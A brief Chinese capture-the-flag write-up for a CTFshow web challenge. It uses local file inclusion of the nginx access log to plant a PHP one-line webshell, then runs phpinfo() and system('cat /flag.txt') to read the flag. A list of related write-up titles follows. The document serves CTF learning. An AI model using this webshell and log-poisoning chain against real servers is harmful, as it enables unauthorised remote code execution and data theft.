1.打开环境
Fn+F12(或者F12) 检查元素,打开Hackbar。
Hackbar 安装教程
2.首先访问file=/var/log/nginx/access.log看日志文件是否存在
一句话木马:
<?php @eval($_GET['pass']);?>上述操作结果如下:
3.添加: &pass=phpinfo();
效果:
(emm..有点走远了.....)
4. 改成: &pass=system("cat /flag.txt");
找到flag了!!!!!
详细解决方案
CTFshow webAK赛 (签到_观己)
热度:55 发布时间:2023-11-29 20:52:09.0
相关解决方案
- ctfshow 文件上传161-167
- ctfshow 文件上传
- CTFshow-吃鸡杯-RE
- ctfshow web入门(thinkphp专题)
- ctfshow-吃鸡杯-Crypto-Writeup
- 《ctfshow vip限免题目|CSDN创作打卡》
- CTFshow webAK赛 (签到_观己)
- ctfshow 数据库恶意下载
- ctfshow 前端密钥泄露
- ctfshow js敏感信息泄露
- ctfshow CDN穿透
- ctfshow 探针泄露
- ctfshow 编辑器配置不当
- ctfshow 内部技术文档泄露
- ctfshow 敏感信息公布
- ctfshow 域名txt记录泄露
- ctfshow cookie泄露
- ctfshow vim临时文件泄露
- ctfshow 版本控制泄露源码2
- ctfshow 源码压缩包泄露
- ctfshow robots泄露
- ctfshow 协议头信息泄露
- ctfshow 前台JS绕过
- CTFshow 源码泄露
- ctfshow-web-xss
- ctfshow 信息搜集(web入门)
- ctfshow-misc
- ctfshow- sql注入(web入门)
- ctfshow 反序列化1
- ctfshow web13-14